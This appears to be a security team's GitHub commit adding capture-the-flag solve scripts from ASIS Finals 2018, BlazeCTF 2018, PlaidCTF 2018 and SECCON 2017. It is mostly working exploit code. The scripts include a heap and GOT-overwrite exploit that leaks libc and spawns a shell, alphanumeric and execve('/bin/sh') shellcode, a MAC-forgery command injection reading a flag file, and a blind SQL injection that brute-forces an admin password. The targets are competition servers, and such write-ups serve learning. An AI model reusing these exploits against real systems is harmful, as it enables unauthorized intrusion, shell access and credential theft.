lots of CTFs

osirislab · May 11, 2018 · f29ad80 · f29ad80
1 parent 9e5ef9d
commit f29ad80
Show file tree

Hide file tree

Showing 19 changed files with 1,157 additions and 0 deletions.
diff --git a/ASIS_Finals_2018/cat/solve.py b/ASIS_Finals_2018/cat/solve.py
@@ -0,0 +1,90 @@
+from pwn import *
+context.log_level = 'DEBUG'
+
+e = ELF('./Cat')
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+#p = process('./Cat')
+p = remote('178.62.40.102', 6000)
+
+def create(name, kind, age):
+    p.sendline('1')
+    p.recvuntil('> ')
+    p.sendline(name)
+    p.recvuntil('> ')
+    p.sendline(kind)
+    p.recvuntil('> ')
+    p.sendline(str(age))
+
+    p.recvuntil('> ')
+
+def edit(i, name, kind, age, save):
+    p.sendline('2')
+    p.recvuntil('> ')
+    p.sendline(str(i))
+    p.recvuntil('> ')
+    p.sendline(name)
+    p.recvuntil('> ')
+    p.sendline(kind)
+    p.recvuntil('> ')
+    p.sendline(str(age))
+    p.recvuntil('> ')
+    if save:
+        p.sendline('y')
+    else:
+        p.sendline('n')
+
+
+def print_one(i):
+    p.sendline('3')
+    p.recvuntil('> ')
+    p.sendline(str(i))
+
+    p.recvuntil(': ')
+    name = p.recvline()[:-1]
+    p.recvuntil(': ')
+    t = p.recvline()[:-1]
+    p.recvuntil(': ')
+    age = p.recvline()[:-1]
+
+    p.recvuntil('> ')
+
+    return (name, t, age)
+
+def print_all():
+    p.sendline('4')
+    stuff = p.recvuntil('print all:')
+
+    p.recvuntil('> ')
+
+    return stuff
+
+def delete(i):
+    p.sendline('5')
+    p.recvuntil('> ')
+    p.sendline(str(i))
+
+    p.recvuntil('> ')
+
+p.recvuntil('> ')
+create("AAAA", "BBBB", 1)
+create("AAAA", "BBBB", 2)
+edit(1, "a", "b", 2, False)
+p.recvuntil('> ')
+create("CCCC", p64(e.got['putchar'] + 0x100), 2)
+edit(0, "EEEEEEEE", "F"*0x10 + p64(e.got['puts'])[:5], 2, True)
+p.recvuntil('> ')
+
+puts_libc, _, _ = print_one(2)
+puts_libc = u64(puts_libc.ljust(8, '\x00'))
+libc.address = puts_libc - libc.symbols['puts']
+
+print hex(libc.address)
+
+create("/bin/sh", "BBBB", 1)
+create("/bin/sh", "BBBB", 2)
+edit(4, "a", "b", 2, False)
+p.recvuntil('> ')
+create("CCCC", p64(e.got['free']), 2)
+edit(3, p64(libc.symbols['system']), "FFFF", 2, True)
+
+p.interactive()
diff --git a/ASIS_Finals_2018/neighbor/neighbor.py b/ASIS_Finals_2018/neighbor/neighbor.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+from pwn import *
+import hashlib
+import itertools
+import numpy as np
+
+context.log_level = "debug"
+p = remote("37.139.22.174", 11740)
+p.recvuntil("Submit")
+ln = p.recvn(len("a printable string X, such that sha256(X)[-6:] = 10d36290"))
+brute_str = ln.split(" = ")[-1].strip()
+print(brute_str)
+
+def brute():
+    for count in range(1,126):
+        for i in itertools.combinations(range(32, 126), count):
+            string = "".join(map(chr,i))
+            sha = hashlib.sha256(bytes(string))
+            if sha.hexdigest()[-6:] == brute_str:
+                print(string)
+                return string
+
+p.sendline(brute())
+p.recvline()
+p.recvline()
+
+n = int(p.recvline().split(" = ")[-1].strip())
+#p.interactive()
+
+def pcomp(n):
+    p2 = 1;
+    i = 0;
+    while( p2 < n ):
+        p2 = np.left_shift(p2, 2);
+        i = np.add(i, 2);
+
+    p2= np.right_shift(p2, 2);
+    i = np.subtract(i, 2);
+    p2  = np.right_shift(p2, i/2)
+    return p2
+
+
+def squareLowerThan(n):
+    p = pcomp(n)
+    p2 = np.square(p)
+    d = 1; 
+    while( p2 + np.multiply(2,p) + d < n ):
+        p2 = np.add(p2, np.multiply(2,p) + d);
+        d = np.add(d, 2);
+    return p2;
+
+ans = squareLowerThan(n)
+print(ans)
+p.sendline(str(ans))
+print p.recvall()
diff --git a/BlazeCTF_2018/magic-pwn.py b/BlazeCTF_2018/magic-pwn.py
@@ -0,0 +1,66 @@
+from pwn import *
+
+p = process('./magic')
+#p = remote('magic.420blaze.in', 420)
+
+asm_s = ""
+asm_s += "dec esp;" * 4
+asm_s += "pop ebx;" # ebx = 0
+asm_s += "push ebx; pop eax;" # eax = 0
+asm_s += "inc eax;" * 3 # eax = 3 for sys_read
+
+asm_s += """
+push esp;
+inc esp;
+pop ecx;
+"""
+asm_s += "push ecx; pop ebp;" # ebp = 0x61313375
+# shift 0x61313375 -> 0x61313370
+asm_s += "dec ecx;" * 5
+# shift 0x61313375 -> 0x61313380
+asm_s += "inc ebp;" * (0x80-0x75)
+asm_s += """
+push ecx;
+dec esp;
+"""
+asm_s += "pop esp;"
+
+# esp = 0x31337050
+
+# 0x31337000:     0xbc    0x00    0x71    0x33    0x31    0x61    0x8b    0x25
+# 0x31337008:     0x20    0x71    0x33    0x31    0x54    0x89    0x25    0x20
+# 0x31337010:     0x71    0x33    0x31    0xbc    0x20    0x71    0x33    0x31
+# 0x31337018:     0x60    0xe9    0x6d    0x16    0xd1    0xd6    0x00    0x00
+
+# shift stack from 0x31337050 -> 0x31337024
+asm_s += "push ebx;" * ((0x50-0x24) / 4)
+
+asm_s += "push esp; pop ecx;" # ecx = 0x024
+asm_s += "dec ecx;" * 4 # ecx = 0x020
+
+asm_s += "push ebx;" # sp = 0x020
+asm_s += "dec esp;" * 4 # 020 -> 01c
+asm_s += "pop edi;" # eax = 0xd6d1
+asm_s += "dec edi;" * (0xd1-0xcd) # eax=0xcd, esp=0x31337020
+asm_s += "inc esp;" * 2 # esp=0x22
+asm_s += "push edi;" # set *0x3133701e=0xcd
+asm_s += "pop edi;"
+asm_s += "inc esp;"
+asm_s += "push ebp;"
+asm_s += "dec esp;"
+
+asm_s += "push ebx;" # overwrite jump target
+
+
+stuff = asm(asm_s)
+
+print(stuff)
+print(len(stuff))
+
+p.sendline(stuff)
+sleep(1)
+p.sendline("\x31\xc0\x50\x68\x2f\x2f\x73"
+                           "\x68\x68\x2f\x62\x69\x6e\x89"
+                                              "\xe3\x89\xc1\x89\xc2\xb0\x0b"
+                                                                 "\xcd\x80\x31\xc0\x40\xcd\x80")
+p.interactive()
diff --git a/BlazeCTF_2018/magic-re.py b/BlazeCTF_2018/magic-re.py
@@ -0,0 +1,51 @@
+from pwn import *
+import subprocess
+
+e = ELF('./magic')
+
+regs = ['EDI', 'ESI', 'EBP', 'ESP', 'EBX', 'EDX', 'ECX', 'EAX']
+
+last_msg = "AAAABAAACAAADAAAEAAAFAAAGAAAHAAA"
+
+out = "pop ESI;"
+
+for i in range(1, 48):
+    stack = e.string(e.u32(e.symbols['r'] + (i*8 - 4)))
+    msg = e.string(e.u32(e.symbols['r'] + (i*8)))
+    next_stack = e.string(e.u32(e.symbols['r'] + (i*8 + 4)))
+
+    # pushes don't modify msg
+    if len(next_stack) > len(stack):
+        pushed_val = next_stack[:4]
+        idx = msg.find(pushed_val)
+        if idx == -1:
+            idx = 3 # ESP
+        else:
+            assert idx % 4 == 0
+            idx /= 4
+        out += "push "+regs[idx]+";"
+        continue
+
+    for j in range(0, 8*4, 4):
+        if msg[j:j+4] != last_msg[j:j+4]:
+            reg = regs[j/4]
+            op = ""
+
+            if len(next_stack) < len(stack):
+                op = "pop "+reg+";"
+            else:
+                old_val = u32(last_msg[j:j+4])
+                new_val = u32(msg[j:j+4])
+                if new_val < old_val:
+                    op = "dec "+reg+";"
+                else:
+                    op = "inc "+reg+";"
+
+            last_msg = msg
+            out += op
+            break
+    else:
+        print hex(e.symbols['r'] + (i*8))
+
+stuff = subprocess.check_output(['rasm2', '-b', '32', out])
+print stuff.strip().decode('hex')
diff --git a/BlazeCTF_2018/something_happening.py b/BlazeCTF_2018/something_happening.py
@@ -0,0 +1,18 @@
+import requests
+
+flag = [''] * 0x100
+
+for i in range(0x100, 0x3986):
+    j = requests.post("http://something.420blaze.in:8545/", data='{"jsonrpc":"2.0","method":"eth_getBlockByNumber","params":["'+hex(i)+'", true],"id":1}', headers={"Content-Type": "application/json"}).json()
+    for tx in j['result']['transactions']:
+        func = tx['input'][2:10]
+        arg1 = tx['input'][10:10+64]
+        arg2 = tx['input'][74:74+64]
+        arg3 = tx['input'][74+64:202]
+        arg4 = tx['input'][202:].decode('hex').rstrip('\x00')
+        if func == 'd1d13ebf':
+            idx = int(arg1[-2:], 16)
+            char = arg4[-1]
+            flag[idx] = char
+            print(flag)
+
diff --git a/PlaidCTF_2018/macsh/solve.py b/PlaidCTF_2018/macsh/solve.py
@@ -0,0 +1,45 @@
+from pwn import *
+
+r = remote('macsh.chal.pwning.xxx', 64791)
+r.recvuntil('> ')
+
+ls_blk = 'echo AAAAAAAAAAA'
+len_blk = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10'
+pad_blk = '\x10'*16
+a_blk = 'A'*16
+
+entered_len_blk = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00'
+
+m1 =    entered_len_blk + pad_blk + a_blk + (a_blk*(16*8 - 3))
+m1+=    ls_blk          + len_blk + a_blk + (a_blk*(16*8 - 3))
+
+r.sendline('<|>tag '+ls_blk)
+echo_len_pad = r.recvline().strip().decode('hex')
+print(echo_len_pad)
+r.recvuntil('> ')
+
+r.sendline('<|>tag '+m1)
+echo_len = r.recvline().strip().decode('hex')
+print(echo_len)
+r.recvuntil('> ')
+
+def xor(x,y):
+    return ''.join(chr(ord(a)^ord(b)) for a,b in zip(x,y))
+
+pad = xor(echo_len_pad, echo_len)
+
+ls_blk = 'cat ././flag.txt'
+
+m1 =    entered_len_blk + pad_blk + a_blk + (a_blk*(16*8 - 3))
+m1+=    ls_blk          + len_blk + a_blk + (a_blk*(16*8 - 3))
+
+r.sendline('<|>tag '+m1)
+ls_len = r.recvline().strip().decode('hex')
+print(ls_len)
+r.recvuntil('> ')
+
+ls_len_pad = xor(ls_len, pad)
+print(ls_len_pad)
+r.sendline(ls_len_pad.encode('hex') + '<|>' + ls_blk)
+
+r.interactive()
diff --git a/PlaidCTF_2018/shop/seq.txt b/PlaidCTF_2018/shop/seq.txt
diff --git a/SECCON_2017/sqlsrf.py b/SECCON_2017/sqlsrf.py
@@ -0,0 +1,20 @@
+import requests, string
+
+passwd = ""
+
+for i in range(32):
+    for c in string.hexdigits:
+        q = "' UNION SELECT '83d069f7e011dc75b7c98e1c589c059d' FROM users WHERE username='admin' AND password LIKE '{}%'; -- "
+        q = q.format(passwd + c)
+    	x = requests.post("http://sqlsrf.pwn.seccon.jp/sqlsrf/index.cgi?", data={
+    	    'user': q,
+            'pass': 'foo',
+            'login': 'Login'
+    	})
+        if 'menu.cgi' in x.text:
+            passwd += c
+            print passwd
+            break
+    else:
+        print 'asdf'
+